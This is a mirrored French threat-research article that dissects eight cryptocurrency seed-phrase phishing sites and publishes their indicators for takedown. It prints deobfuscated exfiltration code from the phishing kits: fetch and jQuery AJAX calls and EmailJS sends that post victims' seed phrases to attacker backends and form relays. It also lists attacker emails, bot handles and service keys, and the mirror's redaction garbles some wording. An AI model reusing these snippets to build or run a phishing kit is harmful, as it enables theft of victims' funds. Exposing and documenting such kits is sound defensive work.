Editorial mirrorBrand mentions redacted to public IDs. Hover to inspect. Everything else is theatre.How it works
THE ENABLERS REGISTRYRegistrar accountability archive
Archive LiveRead-only public record · No ads · No tracking
Case file folder with redacted documents and confidential investigation report.
CASE / FR / PHISHING ANATOMY

8 outils de vol de phrases de récupération analysés par ingénierie inverse

The Enablers Registry·Editorial mirror·/fr/phishing-anatomy

Public record copy. Brand names withheld, public accreditation numbers preserved. If the body below says “we”, that means the original publisher, not this mirror. TER only preserves, redacts, and re-contextualizes.

Anatomie du « crypto-possibly phishing » :
Analyse de 8 attaques réelles

Nous avons intercepté du trafic de hameçonnage en temps réel, procédé à l'ingénierie inverse de cinq programmes de vol de phrases de récupération et retracé les données volées jusqu'à des bots [REDACTED], des comptes EmailJS et des backends de services de hameçonnage en tant que service (Possibly phishing-as-a-Service).

27 mars 2026 Recherche THE ENABLERS REGISTRY 18 min de lecture
Analyse d'une enquête sur le hameçonnage lié aux cryptomonnaies
L'analyse en temps réel du trafic de hameçonnage intercepté révèle l'ensemble de l'infrastructure d'attaque
8Sites analysés
7Méthodes d'exfiltration
1,824+Identifiants volés
380+Marques de portefeuilles
$0Coût de l'attaquant

Ce que nous avons découvert

Chaque jour, des milliers d'utilisateurs de cryptomonnaies se font dérober leurs fonds par des sites de hameçonnage qui sont impossibles à distinguer des services de portefeuille légitimes. Mais que se passe-t-il alors ? derrière Ce faux bouton « Connect Wallet » ? Où va réellement votre phrase de récupération ?

Nous avons intercepté le trafic HTTP en direct provenant de cinq sites de hameçonnage actifs, téléchargé l'intégralité de leur code source et retracé chaque point de sortie des données jusqu'à sa destination finale. Cette enquête dévoile toute l'anatomie du crypto-hameçonnage moderne — depuis les techniques d'ingénierie sociale qui vous poussent à saisir votre phrase de récupération jusqu'au bot [REDACTED] qui la transmet à l'attaquant en temps réel.

Avertissement

Toutes les phrases de récupération mentionnées dans cet article sont des données de test générées aléatoirement. Aucune information d'identification réelle n'a été compromise au cours de cette enquête. Tous les sites ont été signalés à leurs hébergeurs respectifs et aux services chargés de lutter contre les abus.

Le modèle d'attaque universel

Malgré des identités visuelles et des infrastructures différentes, les 8 sites de hameçonnage suivent tous le exactement le même processus psychologique:

Page d'accueilRenforcement de la confiance
Sélecteur de portefeuilles60 à 110+ logos
Faux message « Connexion en cours... »Minuterie de 3 à 5 secondes
« Échec de la connexion »Ça ne marche jamais
Saisie manuelleGraine / Clé / Magasin de clés
ExfiltrationTG / E-mail / API

L'idée clé : l'animation « Connexion en cours... » est toujours programmé pour échouer. Dans le code source du site n° 4, nous avons trouvé const success = false — aucune tentative de connexion au portefeuille n'est effectuée. L'ensemble du processus vise uniquement à diriger les victimes vers le formulaire « Se connecter manuellement ».

Chaîne d'attaque de hameçonnage cryptographique en six étapes
La chaîne d'attaque universelle en six étapes commune à tous les sites de hameçonnage que nous avons analysés

Les 8 sites : analyse détaillée

1
Protocole de la couche réseau
[REDACTED]
En directIANA #1910 PagesBot [REDACTED] + EmailJS

Usurpation d'identité

Un « protocole décentralisé » fictif destiné à la validation des portefeuilles. Il utilise les flux de cours en temps réel de CryptoCompare et propose des liens vers de véritables explorateurs de blockchain (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) afin de renforcer sa crédibilité. La page d'accueil présente plus de 100 logos de portefeuilles et un processus de « validation » en trois étapes.

La double chaîne d'exfiltration

Le backend le plus sophistiqué des cinq — chaque identifiant volé est acheminé via deux canaux indépendants simultanément :

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on [REDACTED]
  |      |
  |      +--> [REDACTED] Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

Conclusions issues de l'OSINT

IndicateurValeur
E-mail d'arnaqueurBestgrace309@gmail.com
Bot [REDACTED]@DewdropsTG_bot (ID : 7567323692)
Destinataire du [REDACTED]@metatech2 (Identifiant de chat : 7350941887)
Back-end[REDACTED]
Service EmailJSservice_d5qigxs / template_7bqxeaa
Domaine cachélayerschain.in (issu d'une technique d'obfuscation d'adresse e-mail de CF)
Messages envoyés1 824+ (d'après l'identifiant du message [REDACTED])
Âge du domaine2 jours (TLS : 25 mars 2026)
Manquement à la sécurité opérationnelle (OPSEC)

L'adresse e-mail de l'attaquant a été retrouvée dans un Commentaire JavaScript à l'intérieur config.js: // Bestgrace309@gmail.com. Ils ont oublié de le supprimer avant le déploiement. De plus, le backend du relais [REDACTED] est entièrement ouvert : aucune authentification, aucune limitation de débit. En décodant les données de IANA #1910, data-cfemail Outre le code obscurci dans le code HTML, nous avons également découvert une adresse e-mail cachée : support@layerschain.in, reliée à des infrastructures d'hébergement situées en Inde et en Afrique du Sud.

2
Migration du jeton AQLA
[REDACTED]
En directIANA #1910 PagesFormulaires non statiques

Usurpation d'identité

Une reproduction fidèle au pixel près de la réalité Aqualibre (AQLA) page de migration des jetons. Le code HTML contient une balise de métadonnées indiquant la source : data-scrapbook-source="https://token.[REDACTED]/migration", daté du 19 novembre 2024.

L'approche « zéro code »

Cet attaquant a besoin de aucun code côté serveur. Le formulaire envoie ses données directement à Non statique — un backend de formulaire légitime pour les sites statiques. Chaque soumission est transmise à l'adresse e-mail de l'escroc. L'adresse e-mail de l'attaquant est jamais visible dans le code source.

<form action="https://forms.[REDACTED]/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Prix : 0 $

IANA #1910 Pages : gratuit. Formulaires non statiques : gratuit. Aucun domaine acheté. Aucun serveur loué. Coût total de l'infrastructure : zéro dollar.

3
[REDACTED] Typosquat
[REDACTED]
En direct IANA #1910 Pages Formulaires non statiques

Usurpation d'identité

Le sous-domaine contient «safpal« — une erreur d'orthographe volontaire de [REDACTED], un portefeuille matériel très populaire. Le site se présente comme « Blockchain Wallet Rectification » et propose 26 fausses catégories de sujets. Il utilise Typed.js pour animer les noms des chaînes (Ethereum, BSC, Polygon…) et un ticker LiveCoinWatch pour renforcer sa crédibilité.

Même équipement, même opérateur ?

Utilise le exactement le même modèle d'hameçonnage comme le site n° 2 : identique connect.html, identique wallets.html avec plus de 60 logos, utilisant le même backend Un-static (avec un identifiant de formulaire différent — 6f1b82c3...da9943af). Le fait que le kit soit identique laisse fortement supposer que un seul opérateur gérant les deux sites.

Erreurs dans le code : « Privay Policy » (il manque un « c »), « seperated » (il faudrait « separated »), « Kestore » (il manque un « y »). Le champ de mot de passe utilise type="text" au lieu de type="password".

4
Clone de Flare Network
[REDACTED]
En directIANA #1910 PagesDouble utilisation d'EmailJS (redondance)

Usurpation d'identité

Un clone presque parfait du Réseau Flare portail — une véritable blockchain EVM de couche 1 intégrant les protocoles FTSO et Data Connector. Reproduit plus de 30 partenaires de l'écosystème, la navigation et l'identité visuelle. Favicons chargées à partir d'un typosquat : [REDACTED] (il manque un « n » dans « mainnet »).

Redondance double avec EmailJS

Le seul site utilisant deux comptes EmailJS distincts simultanément pour assurer la redondance en cas de déconnexion :

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.[REDACTED]/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Objet de l'e-mail pour chaque vol : "New Wallet Details from Flare".

Il s'agit d'une entreprise financée

Le code HTML contient Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Protection PPC de Lunio, et un Pixel publicitaire Twitter/X. L'attaquant exécute publicité payante pour attirer les victimes vers le site de hameçonnage et filtrer les clics générés par des bots. Ce n'est pas un simple passe-temps : il s'agit d'une opération financée, qui s'appuie sur des outils d'analyse et des dépenses publicitaires.

Site de hameçonnage du réseau Flare combinant EmailJS et de la publicité payante
Site n° 4 : publicités payantes, suivi analytique et double exfiltration — l'opération la plus professionnelle
5
COIN NODE / Correction du portefeuille (PhaaS)
[REDACTED]
Backend hors serviceAPI PulseResolve (PhaaS)

Usurpation d'identité

Un service générique « COIN NODE » / « Wallet Fix » (sans marque spécifique). Copyright « Wallet Fix 2022 » — ce modèle de kit date d'au moins 4 ans. Images hébergées sur [REDACTED] (WordPress sur AWS).

« Possibly phishing-as-a-Service »

L'architecture backend la plus inquiétante : une API multi-locataires basée sur les UUID:

POST https://api.[REDACTED]/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=[REDACTED]&type=phrase&phrase=buddy+surprise+vapor+river+...

Chaque escroc dispose de son propre point de terminaison UUID. Un opérateur central gère l'API, assure le suivi des campagnes et prélève éventuellement une commission sur les fonds volés. Il s'agit de vol de cryptomonnaies à grande échelle — un modèle de « possibly phishing en tant que service ».

Infrastructures associées (pour la plupart hors service)

DomaineFonctionStatut
[REDACTED]API d'exfiltrationNXDOMAIN
[REDACTED]Hébergement de faviconsNXDOMAIN
[REDACTED]Hébergeur de logosNXDOMAIN
[REDACTED]CDN d'imagesEn direct (AWS)
Interface Zombie

Le backend est hors service, mais le L'interface utilisateur est toujours en ligne sur IANA #1910 Pages. Si l'attaquant procède à une nouvelle inscription [REDACTED], le site redevient immédiatement opérationnel.

6
Centre d'assistance + Récupération du grand livre
[REDACTED] & [REDACTED]-recovery.support
En directIANA #1910 Pages + ReplitAPI C2 personnaliséeSaisie semi-automatique BIP39

Usurpation d'identité

A opération à deux volets: un « Centre d'assistance » général à l'adresse [REDACTED] avec 15 catégories de faux billets et 39 marques de portefeuilles, ainsi qu’un Clone de la procédure d'inscription à [REDACTED], fidèle au pixel près à [REDACTED]-recovery.support hébergé sur Replit — avec sélection du modèle d'appareil, configuration du code PIN et une grille de phrase de récupération de 24 mots avec Véritable fonction de saisie automatique BIP39.

Backend C2 anti-scanner

La page d'assistance du portefeuille envoie les données volées à [REDACTED]/log — un serveur C2 nginx/Ubuntu personnalisé derrière IANA #1910. Le backend ignore délibérément toutes les requêtes GET (renvoie le code d'erreur 522 « timeout »), ne répondant qu'aux requêtes POST. Cela signifie que les scanners d'URL, les robots d'indexation de Google Safe Browsing et les chercheurs en sécurité qui envoient des requêtes GET à ce point de terminaison ne voient rien : le C2 semble hors service.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.[REDACTED]",
  allowedWallets: ["[REDACTED]","solfare","[REDACTED]","[REDACTED]",
    "[REDACTED]","[REDACTED]","[REDACTED]","VARA Provisional License","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

Le clone de [REDACTED] exécute un backend Express.js distinct directement sur Replit : POST /api/recovery-phrase collecte {deviceId, pin, phrase}. Elle renvoie 400 {"error":"Invalid data provided"} en cas de données d'entrée incorrectes — ce qui confirme que le backend est en ligne et en cours de validation données volées.

Conclusions issues de l'OSINT

IndicateurValeur
Interface utilisateur (portefeuille)[REDACTED]
Interface utilisateur ([REDACTED])[REDACTED]-recovery.support (34.111.179.208)
Backend C2 [REDACTED] → nginx/1.24.0 Ubuntu
Adresses IP C2104.21.60.163 / 172.67.198.35 (IANA #1910)
Vérification Replita43d3852-5304-47af-a61b-f0f6f3912736
Secrétaire général[REDACTED] ([REDACTED]-recovery.support)
Déployé9 janvier 2026 (en-tête « Last-Modified »)
Pile technologique React + Vite + Tailwind v4.1 + Framer Motion
Fidélité maximale de l'expérience utilisateur

Le fichier JS de 466 Ko contient le liste complète des mots BIP39 pour la saisie semi-automatique en temps réel, 67 occurrences du terme « passphrase » et 39 du terme « mnemonic ». Ce clone du [REDACTED] guide les victimes à travers exactement le même processus d’inscription qu’un véritable appareil [REDACTED] — il s’agit de la page de hameçonnage la plus convaincante de toute cette enquête. Le apiKey Le champ dans la configuration suggère un architecture PhaaS multi-locataires.

7
Plateforme de lancement décentralisée
[REDACTED]
En directIANA #1910 PagesFormSubmit.co

Usurpation d'identité

Une « plateforme de lancement décentralisée » générique avec 21 catégories d'appâts (Staking, migration, KYC, concours, réclamation de récompenses, récupération d'actifs, prévente, création de NFT, comptes bloqués...) et Plus de 70 marques de portefeuilles — l'une des listes de portefeuilles les plus complètes que nous ayons trouvées. La faute de frappe caractéristique « Sychronize » (il manque un « n ») trahit la supercherie.

Le pipeline FormSubmit

Utilisations FormSubmit.co — un service légitime de transmission de formulaires par e-mail. Le hachage du point de terminaison a2cf4131f1a5d39453c7c183df96f86f Il s'agit de la valeur MD5 de l'adresse e-mail de l'escroc. Nous avons testé par force brute des centaines de modèles d'adresses e-mail sur Gmail, Yahoo, Hotmail, ProtonMail, Yandex et [REDACTED]aucun résultat. L'escroc utilise une adresse e-mail peu courante ou générée aléatoirement.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

Conclusions issues de l'OSINT

IndicateurValeur
Domaine[REDACTED]
Hachage de FormSubmita2cf4131f1a5d39453c7c183df96f86f
Identifiant de campagneDAPP DÉCENTRALISÉE
Kit FontAwesomebdc3291137 (kit n° 112310842, version gratuite 6.7.2)
jQuery3.2.1 + 3.5.1 chargés simultanément
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (incompatibilité)
Deux poignées de transport

Kit FontAwesome bdc3291137 — FontAwesome peut identifier le titulaire du compte associé à cet identifiant de kit. La balise de campagne DAPP DECENTRALIZED peut apparaître sur d'autres sites de hameçonnage utilisant le même hachage FormSubmit. Après avoir volé la phrase de récupération, un un faux code QR et un code de référence aléatoire de 7 caractères s'affichent : « Contactez l'administrateur en indiquant votre code de référence unique » — ce qui fait attendre les victimes au lieu de mener une enquête.

8
R2 Bucket + PHP sur un ordinateur personnel
pub-519769e9eb634616b1746c2018641d56.r2.dev
MortIANA #1910 R2PHP + DDNS

Usurpation d'identité

Inconnu — le front-end et le back-end sont tous deux hors ligne. D’après la structure de la charge utile, il s’agissait d’un programme conçu pour voler la phrase de récupération d’un portefeuille cryptographique. Le Bucket public IANA #1910 R2 (stockage d'objets, et non Pages) est un vecteur d'hameçonnage bien documenté avec plus de 5 000 pages malveillantes identifiées et une augmentation du trafic multipliée par 61, selon Netskope.

La configuration du « script kiddie »

Le plus opération primitive dans cette collection. Les phrases de départ sont envoyées mot à mot vers un script PHP s'exécutant sur un ordinateur personnel ou un VPS derrière un service DNS dynamique gratuit :

POST [REDACTED]/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

Conclusions issues de l'OSINT

IndicateurValeur
Interface utilisateur pub-519769e9eb634616b1746c2018641d56.r2.dev [HORS LIGNE]
Back-end [REDACTED] [NXDOMAIN]
Identifiant du seau R2519769e9eb634616b1746c2018641d56
Fournisseur de services DDNS [REDACTED] / [REDACTED] (Cincinnati, Ohio)
DNS NSns10–[REDACTED]
Nom d'utilisateurmercifuljigga4real123
Nom d'utilisateur OSINT : mercifuljigga4real123

« Merciful » + « jigga » (le surnom de Jay-Z) + « 4real » + « 123 » — un pseudonyme très personnel qui trahit une affinité avec la culture hip-hop. Introuvable sur n'importe quelle plateforme répertoriée : GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch ou [REDACTED]. Probablement actif sur [REDACTED], [REDACTED] ou des plateformes de jeux sous ce nom ou des variantes proches. Le nom du fichier fuc.php correspond au style décalé de la poignée.

7 méthodes pour vous faire voler votre phrase de récupération

Comparaison de quatre méthodes d'exfiltration de données par hameçonnage dans le domaine des cryptomonnaies
Sept architectures d'exfiltration distinctes utilisées sur les 8 sites de hameçonnage
MéthodeSitesComment ça marche ?VitesseCoût
Bot [REDACTED]#1 Express.js sur [REDACTED] sert de proxy vers l'API Bot. L'escroc reçoit instantanément un message privé contenant les identifiants. En temps réel$0
EmailJS#1, #4 Le JavaScript côté client envoie directement les données à l'API EmailJS, qui les transmet à l'adresse e-mail de l'escroc. ~1 min$0
Formulaires non statiques#2, #3 Formulaire HTML standard utilisant la méthode POST vers un service de traitement de formulaires légitime qui transmet les données saisies par e-mail. ~1 min$0
FormSubmit.co#7 jQuery AJAX vers FormSubmit.co. Adresse e-mail masquée par un hachage MD5. Campagne marquée du tag « DAPP DECENTRALIZED ». ~1 min$0
API C2 personnalisée#6 L'application [REDACTED] envoie les requêtes vers l'API nginx/Express hébergée derrière IANA #1910. Perd les requêtes GET (522) pour échapper aux scanners. Ne répond qu'aux requêtes POST. En temps réelenviron 5 $ par mois
PHP + DDNS#8 Script PHP sur un ordinateur personnel via un service DNS dynamique gratuit ([REDACTED]). Phrase de départ envoyée mot par mot. En temps réel$0
API PhaaS#5 API multi-locataires basée sur les UUID. Un opérateur central gère l'infrastructure, tandis que les escrocs louent des points de terminaison. En temps réelInconnu

7 signaux d'alerte qui permettent de repérer tous les sites de hameçonnage

Si vous voyez n'importe quel Si c'est le cas, fermez immédiatement l'onglet :

1. Le message « Échec de la connexion » est toujours faux

Les connexions à un véritable portefeuille utilisent le protocole WalletConnect ou des extensions de navigateur. Elles n'affichent jamais d'erreur du type « Échec de la connexion » vous demandant de saisir votre phrase de récupération.

2. Entre 50 et 110+ logos de portefeuilles, une seule destination

Chaque icône de portefeuille renvoie vers le même formulaire. Un véritable service intégrerait le SDK propre à chaque portefeuille.

3. « Erreur » après l'envoi

La fausse « erreur 503 » ou « erreur inconnue » qui s'affiche après l'envoi est intentionnelle. Vos données ont déjà été volées : cette erreur a pour but de vous inciter à réessayer avec un autre portefeuille.

4. Hébergé sur .pages.dev

Ces cinq sites exploitent abusivement l'offre gratuite de IANA #1910 Pages. Aucune vérification d'identité n'est requise. Les abus liés au hameçonnage sur IANA #1910 Pages ont augmenté de 198 % en 2025.

5. Trois onglets : Phrase / Clé privée / Trésor de clés

Aucun service légitime n'a besoin des trois types d'identifiants. Ce formulaire à trois onglets est une caractéristique typique d'un kit de hameçonnage.

6. Aucune interaction avec la blockchain

Aucun de ces sites ne s'affiche ethers.js, web3.js, ni effectuer d'appels RPC. Ce sont de simples formulaires HTML qui se font passer pour des dApps.

7. Infrastructure à coût nul

Hébergement gratuit + services de création de formulaires gratuits + messagerie gratuite = une opération de hameçonnage complète pour 0 $. Si le site ne dispose pas d'un vrai nom de domaine, méfiez-vous.

Tableau complet de l'IOC

À l'attention des équipes de sécurité, des plateformes de renseignements sur les menaces et des personnes signalant des abus :

Domaines et infrastructure

DomaineTypeStatut
[REDACTED]Interface d'hameçonnageEn direct
[REDACTED]Interface d'hameçonnageEn direct
[REDACTED]Interface d'hameçonnageEn direct
[REDACTED]Interface d'hameçonnageEn direct
[REDACTED]Interface d'hameçonnageEn direct
[REDACTED]Backend du relais TGEn direct
[REDACTED]Ressources relatives au typosquattingInconnu
layerschain.inDomaine associéDNS hors service
[REDACTED]Backend PhaaSNXDOMAIN
[REDACTED]Hébergeur de ressourcesNXDOMAIN
[REDACTED]Hébergeur de logosNXDOMAIN
[REDACTED]CDN d'imagesEn direct (AWS)
[REDACTED]Interface d'hameçonnageEn direct
[REDACTED]-recovery.supportHameçonnage sur [REDACTED] (Replit)En direct
[REDACTED]Backend C2 (nginx/Ubuntu)En direct
[REDACTED]Domaine racine404
[REDACTED]Interface d'hameçonnageEn direct
pub-519769e9eb634616b1746c2018641d56.r2.devHameçonnage (catégorie R2)Hors ligne
[REDACTED]Backend PHP (DDNS)NXDOMAIN

Comptes et identifiants

TypeValeurSite
E-mailBestgrace309@gmail.com#1
E-mail (masqué)support@layerschain.in#1
Bot [REDACTED]@DewdropsTG_bot (7567323692)#1
Utilisateur de [REDACTED]@metatech2 (7350941887)#1
EmailJS n° 1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS n° 2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS n° 3service_isy47de / JsVEgXVcaSTro1etu#4
Formulaire non statiquec78173e2d991...94c3f76#2
Formulaire non statique6f1b82c3ce55...da9943af#3
UUID PhaaSa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
Instance de rendurndr-id : ed83576e-b1b3-4c82#1
Vérification Replita43d3852-5304-47af-a61b-f0f6f3912736#6
MD5 de la soumission du formulairea2cf4131f1a5d39453c7c183df96f86f#7
Balise de campagneDAPP DÉCENTRALISÉE#7
Kit FontAwesomebdc3291137 (kit n° 112310842)#7
Identifiant du seau R2519769e9eb634616b1746c2018641d56#8
Nom d'utilisateur/DDNSmercifuljigga4real123#8

Où signaler les tentatives d'hameçonnage liées aux cryptomonnaies ?

Où signaler les sites de hameçonnage liés aux cryptomonnaies — opération de retrait multi-vectorielle
Cibler simultanément l'hébergement, les services backend et les plateformes de messagerie pour une rapidité maximale de retrait
ServiceCe qu'il faut signalerComment
IANA #19107 comptes .pages.dev + 1 compartiment R2abuse.IANA #1910.com
Google Safe BrowsingToutes les URL de hameçonnageSignaler une tentative d'hameçonnage
PhishTankToutes les URL de la liste noire de la communauté[REDACTED]
EmailJS3 comptes faisant l'objet d'abus (identifiants de service ci-dessus)abuse@emailjs.com
Non statique2 points d'extrémité du formulaireContactez-nous via [REDACTED]
[REDACTED]Backend de relais [REDACTED]Afficher le formulaire de signalement d'abus
[REDACTED]@DewdropsTG_bot + @metatech2[REDACTED].org/support
Google (Gmail)Bestgrace309@gmail.comSignaler un abus à Google
Twitter/XCompte publicitaire faisant la promotion du site n° 4Signaler un abus concernant les publicités X
FormSubmit.coHachage a2cf4131... (n° 7)Formulaire de signalement d'abus FormSubmit
Replit[REDACTED]-recovery.support (n° 6)Signaler un abus sur Replit
[REDACTED]Responsable de l'enregistrement pour [REDACTED]-recovery.supportAbus sur [REDACTED]
DNSExit[REDACTED]Abus sur [REDACTED]
FontAwesomeKit bdc3291137 (n° 7)Utilisation abusive de FontAwesome
ChainabuseToutes les campagnes de hameçonnage[REDACTED]

Comment se protéger

La règle d'or

Aucun service sérieux ne vous demandera jamais de saisir votre phrase de récupération sur un site web. Les phrases de récupération ne doivent être saisies que dans le logiciel officiel du portefeuille lors de la restauration de celui-ci — jamais sur des sites web tiers proposant des services de « validation », de « synchronisation » ou de « restauration ».

Avant de connecter un portefeuille :

  • Vérifiez que l'URL correspond bien au domaine officiel. Vérifiez les détails du certificat SSL.
  • Real WalletConnect utilise un code QR ou un lien profond — jamais un formulaire de phrase de récupération.
  • Si la « connexion échoue » et qu'on vous demande de saisir manuellement vos identifiants, il s'agit d'une tentative d'hameçonnage.
  • Vérifiez les URL suspectes sur PhishTank ou VirusTotal avant d'interagir.
  • Utilisez un portefeuille matériel : il nécessite une confirmation physique pour chaque transaction.
  • Ajoutez les URL officielles à vos favoris. Ne cliquez jamais sur les liens contenus dans les publicités, les messages privés ou les réseaux sociaux.

La taxonomie du crypto-hameçonnage

Les voleurs de phrases de récupération ne constituent qu'une catégorie parmi d'autres. Voici un aperçu complet du possibly phishing dans le domaine des cryptomonnaies — nous publierons prochainement des analyses approfondies sur chaque type.

Voleurs de phrases de récupération
De fausses pages « Connect Wallet » qui vous incitent à saisir votre phrase de récupération. Thème central de cet article : analyse de 5 exemples concrets.
Abordé ci-dessus
Détournement de l'approbation
Des dApps malveillantes qui demandent des autorisations illimitées pour des tokens via [REDACTED]. Une fois ces autorisations accordées, le pirate vide votre portefeuille sans avoir besoin de votre phrase de récupération.
À venir
Hameçonnage sur glace (Permit2)
Exploite les autorisations sans consommation de gaz prévues par l'EIP-2612. La victime signe un message hors chaîne qui accorde des droits de transfert de jetons — aucune approbation visible sur la chaîne jusqu'au moment du détournement.
À venir
Fausses annonces d'airdrop
Des airdrops de faux tokens qui nécessitent une « réclamation » via un smart contract malveillant. La transaction de réclamation entraîne en réalité le transfert de vos véritables tokens vers un compte tiers.
À venir
Programmes de détournement du presse-papiers
Un logiciel malveillant qui surveille votre presse-papiers et remplace discrètement les adresses de portefeuille copiées par celle de l'attaquant avant que vous ne les colliez.
À venir
Poussière + Empoisonnement
Les petites transactions provenant d'adresses similaires encombrent votre historique. La victime copie la fausse adresse figurant dans l'historique des transactions pour effectuer son prochain virement.
À venir

La vérité qui dérange

Coût de mise en place d'une opération de hameçonnage liée aux cryptomonnaies $0 et prend moins de 30 minutes. Hébergement gratuit, services de formulaires gratuits, bots de messagerie gratuits. Le pirate à l'origine du site n° 1 a déjà récupéré des identifiants sur Plus de 1 824 victimes. Le site n° 4 est en service publicité payante à grande échelle. Ce n’est pas du travail d’amateur — c’est un véritable secteur d’activité. La seule défense, c’est la vigilance.

Aidez-nous à riposter

THE ENABLERS REGISTRY repère et signale en temps réel les sites de hameçonnage liés aux cryptomonnaies. Si vous tombez sur un site suspect, signalez-le-nous : nous mènerons une enquête et ferons le nécessaire pour qu'il soit supprimé.

Enquêtes connexes

Enquête
La fin de [REDACTED] : IANA #1479 a menti pour protéger un voleur de M
Un vol de Monero qui dure depuis 10 ans. Trois registraires sont intervenus. IANA #1479 a inventé sept mensonges.
Analyse approfondie
Réseaux de vol de cryptomonnaies : une infrastructure mise à nu
Comment les services de « drainer-as-a-service » partagent leurs infrastructures et leurs opérateurs.
Panneau apparent
Panneau de possibly phishing [REDACTED] : accès administrateur complet
Nous avons accédé au panneau d'administration d'une opération de hameçonnage visant [REDACTED].
Infrastructures
Une infrastructure frauduleuse dévoilée : des backends partagés
Comment les réseaux frauduleux partagent leurs serveurs, leurs modèles et leurs flux de paiement.

Continue browsing the ledger

This page is the editorial mirror. Brand names are redacted to public IANA / business identifiers. Use the index to navigate other case files.

Open registrar ledger → All briefings